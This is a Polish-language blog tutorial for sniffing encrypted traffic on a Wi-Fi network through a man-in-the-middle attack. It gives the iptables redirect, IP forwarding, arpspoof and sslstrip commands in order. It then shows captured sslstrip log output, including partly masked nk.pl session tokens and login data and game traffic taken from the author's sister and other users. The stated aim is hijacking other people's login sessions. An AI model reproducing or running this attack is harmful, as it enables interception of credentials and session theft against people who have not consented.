[WiFi] – Sniffing połączeń szyfrowanych w sieci bezprzewodowej

Sniffing/MITM w sieciach bezprzewodowych Atak Man In The Middle, podczas którego będziemy sniffowali sobie sieć i patrzyli kto jest zalogowany na nk i jaki ma numer sesji logowania.

Do dzieła.

Czego potrzebujesz?

  • Linuxa
  • Netstat (included in linux)
  • IPTables (included in linux)
  • Arpspoof (składnik dsniffa, apt-get install dsniff -y)
  • SSLStrip wersja 0.9.0
  • Być podłączonym do sieci, którą atakujesz.

Przyglądnijmy się temu.

  1. Atak będzie bazował na ARP Spoofingu. Czym jest ARPSpoofing?
  2. Pisano o tym zagadnieniu wiele razy.

Atak

Pierwsze co, by atakujący mógł podsłuchać ruch sieciowy to odpowiednio skonfigurować swój komputer jako prawie niewidoczny forwarder danych. (łatwo wykryć po dziwnych danych w pakietach TTL).

Dlatego atak jest łatwy do wykrycia.

Porty forwardujesz tak:

iptables -t nat -A PREROUTING -p tcp --destination-port 
80 -j REDIRECT --to-port 8080

A potem tak:

echo 1 > /proc/sys/net/ipv4/ip_forward

Teraz zobaczmy jakie komputery w sieci są dostępne:

netstat -nr
Kernel IP routing tableDestination Gateway Genmask Flags MSS Window irtt Iface
169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan1
192.168.0.0 0.0.0.0 255.255.0.0 U 0 0 0 wlan1
0.0.0.0 192.168.1.1 0.0.0.0 UG 0 0 0 wlan1

Wykonaj to polecenie by zmienić swoją bramę:

arpspoof -i wlan1 192.168.1.1

Uwaga! Przy dużym obciążeniu sieci ARP Spoofing może wywołać crash sieciowy, alarm u admina, odciąć niektórych userów od sieci, co da adminowi znać, że coś jest nie tak i koniec zabawy! Dziękuję dobranoc.

Sniffing

-Co to SSL Strip?

sslstrip -k -l 8080

Polecenie to znaczy tyle co:

  • -k więc przerwij aktywne sesje HTTPS jakie tylko zauważysz
  • -l 8080 przekaż dane HTTPS na port 8080, bo właśnie ten port jest ustawiony w IPTables na forwardownie.

Ze sniffowane dane będą zapisywane do pliku, ich odczytanie umożliwi Ci wykonanie tajemniczej komendy:

tail sslstrip.log

U mnie akurat przechwyciłem sobie sesję jak telefon sprawdza pogodę oraz siostra ciora w gry MMO Online:
011-08-10 23:41:52,497 POST Data (www.google.com):"newswidget,0.0.0,android,web,en_US*g>*http://nt0.ggpht.com/news/tbn/lNqGNzS2tbAJGET>*http://nt1.ggpht.com/news/tbn/acL19pe7-1wJGET root@Asus-PC:~# tail sslstrip.log 2011-08-10 23:41:52,497 POST Data (www.google.com):"newswidget,0.0.0,android,web,en_US*g>*http://nt0.ggpht.com/news/tbn/lNqGNzS2tbAJGET>*http://nt1.ggpht.com/news/tbn/acL19pe7-1wJGET2011-08-10 23:42:29,822 POST Data (www.howrse.pl):type=galop&id=3925575&course=galop2011-08-10 23:42:32,140 POST Data (www.google.com):"newswidget,0.0.0,android,web,en_US*g,g:gne/lŪ^jK, ( 2011-08-10 23:49:18,901 POST Data (safebrowsing.clients.google.com):goog-malware-shavar;a:35830-45829:s:48324-57676:macgoog-phish-shavar;a:143100-153828:s:73356-77030:mac2011-08-10 23:50:12,476 POST Data (api.webrep.avast.com):{"plugin": {"type": "firefox", "version": "20110201"}, "rules": { "version": "110712152532999"}}
Przy okazji dowiedziałem się, że Google Android bardzo nie dyskretnie zbiera sobie o mnie informacje jaki soft mam zainstalowany:
2011-08-10 23:49:18,901 POST Data (safebrowsing.clients.google.com):goog-malware-shavar;a:35830-45829:s:48324-57676:macgoog-phish-shavar;a:143100-153828:s:73356-77030:mac
Trzeba będzie debiana postawić zamiast Android OS…

Zbieranie danych do przyjemnych nie należy. Ale po jakimś czasie może przytrafić się nam jakaś perełeczka :)
2011-08-10 23:50:32,347 POST Data (nk.pl):t=4eXXXd344cfcXXXXXX7821812b2011-08-10 23:50:33,081 POST Data (nk.pl):2011-08-10 23:50:33,384 POST Data (nk.pl):MjY4OTg2NzNAbxxxXYWxrLnBsADI2ODk4NjczADRlNDMXXXXXXXXXXXXE1ZjhjYzQyMmEyMQ==2011-08-10 23:50:33,609 POST Data (nk.pl):web2011-08-10 23:50:33,917 POST Data (nk.pl):2011-08-10 23:50:34,122 POST Data (nk.pl):2011-08-10 23:50:34,461 POST Data (nk.pl):nktalk_login=1&t=4e4ad34XfXXXXXXX7821812b2011-08-10 23:50:34,478 POST Data (nk.pl):Koń jest bogiem, galop nałogiem. Skoki zabawą trening podstawą :) <32011-08-10 23:50:35,063 POST Data (nk.pl):2011-08-10 23:50:36,353 POST Data (nk.pl):2011-08-10 23:50:45,455 POST Data (nk.pl):urls=%5B%22http%3A%2F%2Fpokazim.pl%2Fw%2Fi%2FKliknijTu38660.jpg%22%2C%22http%3A%2F%2Fpokazim.pl%2Fw%2Fi%2FKliknijTu38653.jpg%22%2C%22http%3A%2F%2Fpokazim.pl%2Fi%2FKliknijTu9.jpg%22%2C%22www.PokazIm.pl%22%5D&t=4e4ad344cxxx5d57xx21812b

[Total: 0    Average: 0/5]